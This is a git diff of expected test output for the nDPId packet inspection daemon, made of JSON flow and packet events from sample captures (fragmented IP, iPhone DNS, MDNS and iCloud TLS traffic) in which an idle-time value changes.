+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","packets-captured":9077,"packets-processed":29,"total-skipped-flows":0,"total-l4-data-len":80,"total-not-detected-flows":29,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18215,"global_ts_msec":1534244033215} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9077/29 diff --git a/test/results/iphone.pcap.out b/test/results/iphone.pcap.out index 48bb5ef32..2aeb1eed3 100644 --- a/test/results/iphone.pcap.out +++ b/test/results/iphone.pcap.out 
@@ -78,8 +78,8 @@ 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454598252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1582454598252,"pkt":"xGGLNYKpxiwDYGpkCABFAACEYIUAAEARlIHAqAIBwKgCEQA12moAcAk\/JH+BgAABAAIAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAcAMAAUAAQAADY0AJAlnc3A4NS1zc2wJbHMyLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA0AAEAAQAAAD8ABBGCAi4="} 00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454598287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598287,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyCcAAEARLJTAqAIBwKgCEQA1xz8Au1lGYEOBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAAC8AA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAOYAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEQAEEf1pysB\/AAEAAQAAABEABBH9Nco="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -89,51 +89,51 @@ 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"AQBeAAD7xGGLNYKpCABFAABemlUAAP8RfYTAqAIR4AAA+xTpFOkASu+LAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598385,"flow_last_seen":1582454598385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598385,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454598385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598385,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZE\/AqAIREYICLsWRAbsZOusXAAAAALDC\/\/+bAAAAAgQFtAEDAwcBAQgKEd\/nUwAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598387,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598387,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598385,"flow_last_seen":1582454598385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598385,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454598385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598385,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZE\/AqAIREYICLsWRAbsZOusXAAAAALDC\/\/+bAAAAAgQFtAEDAwcBAQgKEd\/nUwAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598387,"flow_last_seen":1582454598387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598387,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"} 
+00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 